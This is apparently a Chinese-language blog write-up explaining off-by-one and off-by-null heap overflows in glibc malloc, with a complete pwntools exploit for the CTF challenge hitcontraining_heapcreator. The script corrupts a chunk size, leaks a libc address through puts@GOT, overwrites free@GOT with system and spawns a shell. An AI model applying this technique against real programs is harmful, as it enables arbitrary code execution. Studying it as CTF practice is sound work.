128 字
1 分钟
OffByxxx
aaaaaaaaaaa
Off by one 和 Off by null 都是一种发生在程序中的非预期函数功能,指非预期的溢出一个字节,或者非预期溢出 \x00 这个字节。利用其手法,涉及 libc malloc这个手法的前向合并和后向合并
本质上都是通过多溢出的字节修改 chunk 块的size或prev_inuse位,来使得chunk在被释放时候发生重叠覆盖,从而获取可控制的非法内存
例题 BUU-hitcontraining_heapcreator
from pwn import *
file = "./pwn_patched"host = "127.0.0.1"port = 1234
is_remote = False
context.log_level = "debug"context.binary = file
if is_remote: p = remote(host, port)else: p = process(file)
elf = ELF(file)rop = ROP(elf)libc = ELF("./libc-2.23.so")
def menu(index: int): global p
p.recvuntil(b"Your choice :") p.sendline(str(index).encode())
def create(size: int, content: bytes): global p
menu(1)
p.recvuntil(b"Size of Heap : ") p.sendline(str(size).encode())
p.recvuntil(b"Content of heap:") p.send(content)
def show(index: int) -> bytes: global p
menu(3) p.recvuntil(b"Index :") p.sendline(str(index).encode())
p.recvuntil(b"Content : ") content = u64(p.recvuntil(b"\n",drop=True).ljust(0x8,b'\x00')) return content
def delete(index: int): global p
menu(4)
p.recvuntil(b"Index :") p.sendline(str(index).encode())
def edit(index: int, content: bytes): global p
menu(2)
p.recvuntil(b"Index :") p.sendline(str(index).encode())
p.recvuntil(b"Content of heap : ") p.send(content)
create(0x18, b'aaaa') # chunk1:0x20 chunk2:0x20create(0x20, b'aaaa') # chunk3:0x20 chunk4:0x30create(0x20, b'aaaa') # chunk5:0x20 chunk6:0x30
raw_input(f"已经申请完空间 pwndbg -p {p.pid}")
payload = cyclic(0x18) + p8(0x71)
edit(0, payload)
raw_input(f"one by off")
delete(1)
payload = flat( { 0x50: [ p64(0x20), p64(elf.got["puts"]) ] }, filler = b"\x00")
create(0x60,payload)
puts_addr = show(2)
log.info(f"puts_addr -->{hex(puts_addr)}")
libc.address = puts_addr - libc.symbols["puts"]system_addr = libc.symbols["system"]
payload = flat( { 0x50: [ p64(0x20), p64(elf.got["free"]) ] }, filler = b"\x00")
edit(1,payload)edit(2,p64(system_addr))edit(0,b'/bin/sh\x00')
delete(0)p.interactive() 分享
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时
相关文章 智能推荐